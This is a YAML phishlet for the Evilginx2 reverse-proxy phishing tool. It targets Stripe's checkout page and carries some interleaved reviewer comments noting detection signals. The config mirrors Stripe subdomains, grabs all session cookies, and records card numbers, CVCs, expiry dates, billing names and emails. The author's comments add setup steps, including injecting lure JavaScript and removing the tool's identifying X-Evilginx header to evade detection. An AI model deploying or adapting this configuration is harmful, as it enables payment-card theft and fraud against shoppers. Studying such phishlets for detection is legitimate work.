forked from An0nUD4Y/Evilginx2-Phishlets
stripe.yaml
# Checkout Docs for reference
# https://stripe.com/docs/connect/creating-a-payments-page?destination-or-on-behalf-of=destination
# Steps to follow to integrate evilginx checkout in original payment checkout page
#
# 1) Replace all occurences of stripe.com in html files or in js files with evilginx2 domain
# 2) Read docs for other possible issues (Mentioned Above)
# 3) Also look at domain name stripe.network and change it with evilginx domain in all js and html files in checkout page of website.
# 4) Handling lure is difficult and will require a heavy evilginx2 source code modification, Alternate solution is to inject js in the website index or any page which will trigger the evilginx2 lure and create a valid evilginx session for that user.
#
# Checkout Page -
#
# https://checkout.stripe.com/c/pay/cs_live_b1VLOZemyS8VFjpL7CKqeF83LqaFkITaQd2uWgK0fdZ4D2qF5PBtN9itwh#fidkdWxOYHwnPyd1blppbHNgWmM0dDRLQF9IYDxNQ2c2U3VsYUZVfDJDYycpJ2hsYXYnP34nYnBsYSc%2FJ0tEJyknaHBsYSc%2FJzw9ZDw8MWRkKGY8MGcoMTQyPChkMGNgKDcwPDQwNTA2MzVgN2M3YGdmNycpJ3ZsYSc%2FJzZjZ2NkZDA9KGQ8YWAoMTVjZihnNzA9KDwxYDAzNzAwNjQ8ZzAzN2YwMid4KSdnYHFkdic%2FXlgpJ2lkfGpwcVF8dWAnPydocGlxbFpscWBoJyknd2BjYHd3YHdKd2xibGsnPydtcXF1dj8qKnJycitof3ZubGsrZmpoJ3gl
## List of SubDomains ---
# https://m.stripe.com
# https://m.stripe.network/
# https://js.stripe.com
# https://q.stripe.com
# https://api.stripe.com/
# https://r.stripe.com/
# https://stripe-camo.global.ssl.fastly.net/
# https://checkout.stripe.com
# Note: Do not Forget to remove the easter egg codes from evilginx2 (http_proxy.go),
# Search for 'cantFindMe' and 'egg' in http_proxy.go and comment all relevent code to remove the evilginx header (X-Evilginx)
# Phishlet metadata followed by the reverse-proxy host map.
# NOTE(review): indentation appears to have been lost when this page was
# captured; the lines below are kept exactly as shown.
# The file's header comment refers to an X-Evilginx header emitted by the
# unmodified tool; a request carrying that header is identifiable at the
# origin or at an inspecting proxy.
name: 'stripe'
author: '@an0nud4y'
min_ver: '2.4.0'
# Each entry pairs an origin host (orig_sub + domain) with the subdomain label
# it is served under on the proxy's own domain (phish_sub).
# Origins listed: checkout, m, js, q, api and r on stripe.com, m on
# stripe.network, and stripe-camo.global.ssl on fastly.net.
# Every phish_sub equals its orig_sub, so the same labels would appear under a
# different registrable domain; that label set is something DNS and web-proxy
# logs can be searched for.
# Only the 'checkout' entry sets session: true and is_landing: true.
proxy_hosts:
- {phish_sub: 'checkout', orig_sub: 'checkout', domain: 'stripe.com', session: true, auto_filter: true, is_landing: true}
- {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.network', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'js', orig_sub: 'js', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'q', orig_sub: 'q', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'api', orig_sub: 'api', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'r', orig_sub: 'r', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
- {phish_sub: 'stripe-camo.global.ssl', orig_sub: 'stripe-camo.global.ssl', domain: 'fastly.net', session: false, auto_filter: true, is_landing:false}
# Response-body rewrite rules. Both entries apply to responses from
# checkout.stripe.com with MIME type text/html, application/json or
# application/javascript.
# In each entry the search and replace strings are textually identical;
# '{hostname}' is presumably a placeholder the tool expands differently on each
# side (origin host vs. proxy host) -- confirm against the tool's documentation.
# The second entry additionally sets redirect_only: true.
sub_filters:
- {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
# Token (presumably cookie) selection per domain: '.stripe.com', 'm.stripe.com'
# and 'stripe.com'.
# Every entry uses the single key '.*,regexp', a catch-all pattern, so no
# specific token name is singled out; anything set for these domains matches.
auth_tokens:
- domain: '.stripe.com'
keys: ['.*,regexp']
- domain: 'm.stripe.com'
keys: ['.*,regexp']
- domain: 'stripe.com'
keys: ['.*,regexp']
# POST-body fields recorded from proxied requests. Each rule uses the pattern
# '(.*)', i.e. the whole field value is taken.
# The 'username' and 'password' slots are mapped to card[number] and card[cvc];
# the data at risk is payment-card data, not account passwords.
# The 'custom' list repeats those two fields and adds card expiry month/year,
# billing name and e-mail, plus 'type', 'guid', 'muid', 'sid' and
# 'payment_user_agent'.
# NOTE(review): guid/muid/sid look like client or session identifiers -- confirm
# against Stripe's documentation.
credentials:
username:
key: 'card[number]'
search: '(.*)'
type: 'post'
password:
key: 'card[cvc]'
search: '(.*)'
type: 'post'
custom:
- key: 'type'
search: '(.*)'
type: 'post'
- key: 'card[number]'
search: '(.*)'
type: 'post'
- key: 'card[cvc]'
search: '(.*)'
type: 'post'
- key: 'card[exp_month]'
search: '(.*)'
type: 'post'
- key: 'card[exp_year]'
search: '(.*)'
type: 'post'
- key: 'billing_details[name]'
search: '(.*)'
type: 'post'
- key: 'billing_details[email]'
search: '(.*)'
type: 'post'
- key: 'guid'
search: '(.*)'
type: 'post'
- key: 'muid'
search: '(.*)'
type: 'post'
- key: 'sid'
search: '(.*)'
type: 'post'
- key: 'payment_user_agent'
search: '(.*)'
type: 'post'
# URL paths ('/' and '/c') listed under auth_urls; presumably the tool treats a
# request to one of them as the point at which a session is complete --
# confirm against the tool's documentation.
auth_urls:
- '/'
- '/c'
# Landing location on the mirrored origin: host checkout.stripe.com, path '/'.
login:
domain: 'checkout.stripe.com'
path: '/'